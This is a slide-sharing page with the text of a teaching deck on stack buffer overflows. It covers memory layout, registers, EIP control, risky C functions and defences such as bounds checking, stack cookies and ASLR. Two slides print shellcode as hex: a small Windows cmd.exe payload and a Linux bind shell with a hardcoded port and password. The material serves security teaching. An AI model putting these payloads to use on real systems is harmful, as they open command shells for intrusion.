Buffer Overflow Demo by Saurabh Sharma
•Download as PPTX, PDF•
4 likes•2,830 views
The document discusses buffer overflows, which occur when user input exceeds the maximum size of a buffer and overwrites other areas of memory. This can allow malicious users to execute arbitrary code by injecting machine code into the overflowed buffer. The document provides examples of stack layout, shellcode payloads, and prevention techniques like bounds checking functions and security mechanisms like ASLR.
Report
Share
More Related Content
What's hot
What's hot (20)
Viewers also liked
Viewers also liked (11)
Similar to Buffer Overflow Demo by Saurabh Sharma
Similar to Buffer Overflow Demo by Saurabh Sharma (20)
More from n|u - The Open Security Community
More from n|u - The Open Security Community (20)
Recently uploaded
Recently uploaded (20)
Buffer Overflow Demo by Saurabh Sharma
- 3. Buffer: The memory area where the user input is stored.Overflow: The user input exceeds the maximum size of the buffer, overwriting the other areas of the memory and corrupting those areas.Anatomy of Buffer Overflows
- 4. void get_input() { char buf[1024]; gets(buf);}void main(intargc, char*argv[]){get_input();}User controls the input. Malicious user can supply the input of more than 500 chars. So what ??User can supply a malicious input which can execute some other exe. This can also be your cmd.exe and may lead to the system compromise.A small example
- 5. Text: Contains instructionsData: Contains initialized variablesBSS: Contains uninitialized global and static variables(initialized to 0)Heap: Contains dynamic, uninitialized data(malloc())Stack: Contains function arguments and local variablesMemory overview
- 6. Stack Frame:holds variables and data for functionStack grows from higher memory location to lower memory locationHeap: lower to higherMemory overview
- 7. General purpose: For basic calculations.ESI, EDI: Used mostly with arraysFlags: Outcome of several instructions set the flagsSegment: Code, stack, data.EBP:Base pointer, points to the beginning of the current stack frameESP: Stack pointer, points to the top of the stackEIP: Instruction pointer, points to the next instructionREGISTERS
- 8. Stack is a LIFO data structure. Temporary memory, formed when the function called.A new stack frame created when the function is called.The return address is saved just above the local variables.Stack LayoutLower addressparametersReturn addr(saved EIP)Saved EBPStack growsLocal variablesHigher address
- 9. So, if the EIP can be controlled, the next instruction to be executed can be controlled.Stack LayoutLower addressparametersReturn addr(saved EIP)Saved EBPStack growsLocal variablesHigher address
- 10. Machine code which is injected into the overflown bufferDoes the work for youWORK: executing a third program, adding an administrator etc.SHELLCODE
- 11. win32/xp sp2 (En) cmd.exe 23 bytes Author : MountassifMoad A.K.A : "8bec68657865" "2068636d642e" "8d45f850b88D" "15867Cffd0"; EXAMPLE SHELLCODES(SMALL)
- 12. BY NRAZIZ * * */ /* * Binds to port 48138 * Password: haxor */ char bindcode[]="31db5343536a0289e1b066cd80" "31d2526668bc0a666a0289e26a" "10526a0389e1fec3b066cd806a" "026a0389e1b304b066cd8031c9" "51516a0389e1fec3b066cd8031" "db536a3a685061737389e66a05" "566a0489e1b309b066cd8031c9" "31f6516a05526a0489e1b30ab0" "66cd8031c9516a72686861786f" "89e789d680c105fcf3a675bf31" "c9b304b03fcd804183f90375f6" "31c050682f2f7368682f62696e" "89e3505389e131d2b00bcd80b0" "01cd80"EXAMPLE SHELLCODES(bigger)
- 13. DEMO
- 14. strcpy() strcat() sprintf() scanf() sscanf() fscanf() vfscanf() vsprintfvscanf() vsscanf() streadd() strecpy() strtrns() MAJOR SNARES
- 15. Buffer size must be checkedUse alternative functions e.g. strncpy(dst, src, dst_size-1) instead of strcpy(dst, src)Other protection mechanisms like /GS(stack cookie), ASLR, SafeSEH compilationPREVENTION